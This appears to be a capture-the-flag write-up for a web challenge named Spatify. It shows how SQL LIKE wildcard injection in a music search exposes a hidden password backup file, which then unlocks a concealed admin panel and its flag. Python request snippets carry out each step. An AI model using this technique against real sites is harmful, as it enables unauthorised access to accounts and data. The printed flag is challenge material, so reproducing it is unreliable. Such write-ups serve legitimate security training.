Difficulty
Easy
Points
150
Description
Welcome to spatify, the perfect place to enjoy some royalty-free music with neither ads nor vulnerabilities at all!
Quick Analysis
Spatify robots.txt file discovery
After running the Burpsuite crawler, or any crawler, the crawler discovered a /robots.txt file.
What is a robots.txt file used for?
[1] The robots.txt file tells search engine crawlers which URLs the crawler can access on your site.
Content of robots.txt
Copy from requests import get, post
url = 'https://blackhat4-944f71937411184fb04dddb0c9371eb1-0.chals.bh.ctf.sa'
Copy file = '/robots.txt'
response = get(url + file)
print(response.text)
Copy User-agent: *
Disallow: /superhiddenadminpanel/ Spatify's admin panel
The Spatify admin panel /superhiddenadminpanel/ can only be access via a password.
Spatify search engine
The Spatify home page / search for music based on the music name.
Default listed music
Copy <div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/goldn.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/guitar.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
</audio>
</div> Analyze the search SQL Query
The search requires input with at least five characters.
The common word between all three music names is FEATURED. The result of FEATURED search is the same as the home page default music.
I assume the SQL Query querying is based on LIKE operator.
The SQL LIKE Operator
[2] The LIKE operator is used in a WHERE clause to search for a specified pattern in a column.
There are two wildcards often used in conjunction with the LIKE operator:
The percent sign (%) represents zero, one, or multiple characters
The underscore sign (_) represents one, single character
LIKE syntax
Copy SELECT column1, column2, ...
FROM table_name
WHERE columnN LIKE pattern; Spotify Search with SQL Wildcards
The result of FEATURE% search is the same as the home page default music, which means the query is injectable with SQL wildcards.
Exploitation
SQL wildcard injection
List all music records with wildcards with five percent signs %. q=%%%%%%
Copy <div class="mb-2"><b>😋 🅟🅐🅢🅢🅦🅞🅡🅓 🅑🅐🅒🅚🅤🅟 😋</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/secret_password_backup.txt.bak" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/goldn.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/guitar.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
</audio>
</div> Content of secret_password_backup.txt.bak
Copy file = '/static/audio/secret_password_backup.txt.bak'
response = get(url + file)
print(response.text)
Copy THISISTHEPASSWORDTOTHEADMINPANEL123321123321 The flag
Copy import re
endpoint = '/superhiddenadminpanel/'
data = { 'password': 'THISISTHEPASSWORDTOTHEADMINPANEL123321123321' }
response = post(url + endpoint, data = data)
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0))
Copy BlackHatMEA{551:14:dc339129777027c07c8c63bd0310f7da6d9074a6} References
https://developers.google.com/search/docs/crawling-indexing/robots/intro
https://www.w3schools.com/sql/sql_like.asp
